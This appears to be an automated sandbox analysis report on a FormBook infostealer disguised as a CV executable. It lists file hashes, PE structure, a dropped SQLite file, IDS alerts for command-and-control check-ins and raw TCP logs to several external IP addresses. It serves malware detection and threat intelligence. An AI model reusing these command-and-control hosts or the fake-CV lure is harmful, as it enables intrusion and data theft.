                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\b863adc9d550931e279ac7e2ee517d1f\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\10879c5bddb2dd2399e2098d

                                                                                                C:\Users\user\AppData\Local\Temp\aU043Z43

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                Category:dropped
                                                                                                Size (bytes):135168
                                                                                                Entropy (8bit):1.1142956103012707
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                                MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                                SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                                SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                                SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):7.852838702037999
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                File name:Maryam Farokhi-PhD- CV-1403.exe
                                                                                                File size:747'008 bytes
                                                                                                MD5:de148dc1610a111af0b004e4d0d851a4
                                                                                                SHA1:5ac1d2f9bd4934240c7de727bf1e42c3eab7b257
                                                                                                SHA256:47b2857258f743ca87c19d38ebec95a1bc1c0490341ad9f08560529bfcb861e1
                                                                                                SHA512:8c61ca2734a14e33440a0b0e00e378f709b72e0d72211ffa7d0d73a0e3eb9b8e5f4480511254b0ef7c86a64bdd31989a656fa06d333343356ded3a539880fc71
                                                                                                SSDEEP:12288:MKq0LA8PMKj4j6kak/uXl4NzXe1j/QMSEiVOkXP4kCPa0:JA8zHwuez2QgiVFf4kC
                                                                                                TLSH:D2F41250B669E921C99A03794572C3BA87749ECEE121D3578FFAACE7BC07B357C04142
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=.1g..............0..0...4.......O... ...`....@.. ....................................@................................

                                                                                                File Icon

                                                                                                Icon Hash:3e632cc46d6c4579

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x4b4ff2
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x6731E03D [Mon Nov 11 10:45:17 2024 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb4f9d0x4f.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb60000x3054.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000xc.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xb2ca80x54.text
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x20000xb2ff80xb3000cb49f64289405c094bb4ca78e39a8258False0.9285636347765364data7.8582749593762085IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0xb60000x30540x32005cbeb5300bd3c955fcd27055a80506d3False0.9096875data7.6589108686779594IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0xba0000xc0x200113717bce31a60e5d646c64c61e94e57False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_ICON0xb60c80x2c58PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9821176885130374
                                                                                                RT_GROUP_ICON0xb8d300x14data1.05
                                                                                                RT_VERSION0xb8d540x2fadata0.44750656167979

                                                                                                Imports

                                                                                                DLLImport
                                                                                                mscoree.dll_CorExeMain

                                                                                                Network Behavior

                                                                                                Suricata IDS Alerts

                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2024-11-11T17:01:01.043848+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204974685.159.66.9380TCP
                                                                                                2024-11-11T17:01:24.537105+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497503.33.130.19080TCP
                                                                                                2024-11-11T17:01:37.974891+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497543.33.130.19080TCP
                                                                                                2024-11-11T17:01:52.348543+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049758185.68.16.9480TCP
                                                                                                2024-11-11T17:02:05.773871+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049762199.59.243.22780TCP
                                                                                                2024-11-11T17:02:20.040926+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049766192.64.118.22180TCP
                                                                                                2024-11-11T17:02:34.538500+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049770154.23.184.9580TCP
                                                                                                2024-11-11T17:02:48.097162+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204977413.248.169.4880TCP
                                                                                                2024-11-11T17:03:01.548411+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497783.33.130.19080TCP
                                                                                                2024-11-11T17:03:15.045527+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497823.33.130.19080TCP
                                                                                                2024-11-11T17:03:28.518727+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497873.33.130.19080TCP
                                                                                                2024-11-11T17:03:42.595445+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204979145.79.252.9480TCP
                                                                                                2024-11-11T17:03:57.211155+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204979543.156.106.10980TCP
                                                                                                2024-11-11T17:04:11.374664+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497993.33.130.19080TCP
                                                                                                2024-11-11T17:04:25.018148+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049803104.21.56.1380TCP
                                                                                                2024-11-11T17:04:42.828035+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204980485.159.66.9380TCP
                                                                                                2024-11-11T17:04:57.152971+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20498083.33.130.19080TCP
                                                                                                2024-11-11T17:05:10.455044+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20498123.33.130.19080TCP
                                                                                                2024-11-11T17:05:24.333100+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049816185.68.16.9480TCP
                                                                                                2024-11-11T17:05:37.604291+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049820199.59.243.22780TCP
                                                                                                2024-11-11T17:05:51.695304+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049824192.64.118.22180TCP
                                                                                                2024-11-11T17:06:06.273646+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049828154.23.184.9580TCP
                                                                                                2024-11-11T17:06:19.588475+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204983213.248.169.4880TCP
                                                                                                2024-11-11T17:06:32.861007+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20498363.33.130.19080TCP

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Nov 11, 2024 17:01:00.520308971 CET4974680192.168.11.2085.159.66.93
                                                                                                Nov 11, 2024 17:01:00.776686907 CET804974685.159.66.93192.168.11.20
                                                                                                Nov 11, 2024 17:01:00.776942015 CET4974680192.168.11.2085.159.66.93
                                                                                                Nov 11, 2024 17:01:00.784406900 CET4974680192.168.11.2085.159.66.93
                                                                                                Nov 11, 2024 17:01:01.043497086 CET804974685.159.66.93192.168.11.20
                                                                                                Nov 11, 2024 17:01:01.043848038 CET4974680192.168.11.2085.159.66.93
                                                                                                Nov 11, 2024 17:01:01.046356916 CET4974680192.168.11.2085.159.66.93
                                                                                                Nov 11, 2024 17:01:01.302640915 CET804974685.159.66.93192.168.11.20
                                                                                                Nov 11, 2024 17:01:16.262768030 CET4974780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:16.398485899 CET80497473.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:16.398704052 CET4974780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:16.406161070 CET4974780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:16.540987015 CET80497473.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:16.542117119 CET80497473.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:16.542278051 CET4974780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:17.914972067 CET4974780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:18.049675941 CET80497473.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:18.932311058 CET4974880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:19.068231106 CET80497483.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:19.068461895 CET4974880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:19.075959921 CET4974880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:19.210524082 CET80497483.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:19.211016893 CET80497483.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:19.211180925 CET4974880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:20.586237907 CET4974880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:20.721066952 CET80497483.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:21.603610039 CET4974980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:21.721071005 CET80497493.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:21.721360922 CET4974980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:21.729159117 CET4974980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:21.729191065 CET4974980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:21.846580029 CET80497493.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:21.846622944 CET80497493.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:21.846652985 CET80497493.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:21.846679926 CET80497493.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:21.846707106 CET80497493.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:21.846735954 CET80497493.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:21.846762896 CET80497493.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:21.864559889 CET80497493.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:21.864799976 CET4974980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:23.241885900 CET4974980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:23.359276056 CET80497493.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:24.259234905 CET4975080192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:24.395648003 CET80497503.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:24.395894051 CET4975080192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:24.400902987 CET4975080192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:24.535471916 CET80497503.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:24.536736012 CET80497503.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:24.536782980 CET80497503.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:24.537105083 CET4975080192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:24.538917065 CET4975080192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:24.673670053 CET80497503.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:29.737503052 CET4975180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:29.854939938 CET80497513.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:29.855153084 CET4975180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:29.862476110 CET4975180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:29.979986906 CET80497513.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:29.998183012 CET80497513.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:29.998469114 CET4975180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:31.365273952 CET4975180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:31.482760906 CET80497513.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:32.382607937 CET4975280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:32.499993086 CET80497523.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:32.500325918 CET4975280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:32.507740021 CET4975280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:32.624914885 CET80497523.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:32.642644882 CET80497523.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:32.642924070 CET4975280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:34.020762920 CET4975280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:34.138108015 CET80497523.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:35.038149118 CET4975380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:35.174433947 CET80497533.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:35.174818039 CET4975380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:35.182434082 CET4975380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:35.182477951 CET4975380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:35.182528973 CET4975380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:35.317460060 CET80497533.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:35.317506075 CET80497533.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:35.317534924 CET80497533.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:35.317749977 CET80497533.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:35.317825079 CET80497533.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:35.317861080 CET80497533.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:37.709615946 CET4975480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:37.826877117 CET80497543.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:37.827078104 CET4975480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:37.832010031 CET4975480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:37.949286938 CET80497543.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:37.974514961 CET80497543.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:37.974656105 CET80497543.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:37.974890947 CET4975480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:37.976670027 CET4975480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:37.982419014 CET80497543.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:37.982639074 CET4975480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:38.093822956 CET80497543.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:43.501188993 CET4975580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:43.748636961 CET8049755185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:43.748914957 CET4975580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:43.756465912 CET4975580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:44.003981113 CET8049755185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:44.004575968 CET8049755185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:44.004638910 CET8049755185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:44.004795074 CET4975580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:45.268275023 CET4975580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:46.285738945 CET4975680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:46.533102989 CET8049756185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:46.533329010 CET4975680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:46.540749073 CET4975680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:46.788149118 CET8049756185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:46.788795948 CET8049756185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:46.788821936 CET8049756185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:46.789041996 CET4975680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:48.048962116 CET4975680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:49.066477060 CET4975780192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:49.313721895 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.314064980 CET4975780192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:49.321801901 CET4975780192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:49.321827888 CET4975780192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:49.569219112 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.569272041 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.569315910 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.569354057 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.569386959 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.569432974 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.569487095 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.570049047 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.570102930 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.570290089 CET4975780192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:50.829775095 CET4975780192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:51.847007036 CET4975880192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:52.094563007 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:52.094813108 CET4975880192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:52.099905968 CET4975880192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:52.347430944 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:52.348261118 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:52.348331928 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:52.348392010 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:52.348445892 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:52.348490000 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:52.348524094 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:52.348542929 CET4975880192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:52.348812103 CET4975880192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:52.350677013 CET4975880192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:52.598259926 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:57.545526981 CET4975980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:01:57.662703991 CET8049759199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:01:57.662960052 CET4975980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:01:57.670465946 CET4975980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:01:57.787633896 CET8049759199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:01:57.805486917 CET8049759199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:01:57.805496931 CET8049759199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:01:57.805572033 CET8049759199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:01:57.805680037 CET4975980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:01:57.805737972 CET4975980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:01:57.813030005 CET8049759199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:01:57.813277006 CET4975980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:01:59.171489954 CET4975980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:00.188925028 CET4976080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:00.306332111 CET8049760199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:00.306541920 CET4976080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:00.314034939 CET4976080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:00.431447029 CET8049760199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:00.449143887 CET8049760199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:00.449215889 CET8049760199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:00.449265957 CET8049760199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:00.449502945 CET4976080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:00.449502945 CET4976080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:00.456804991 CET8049760199.59.243.227192.168.11.20
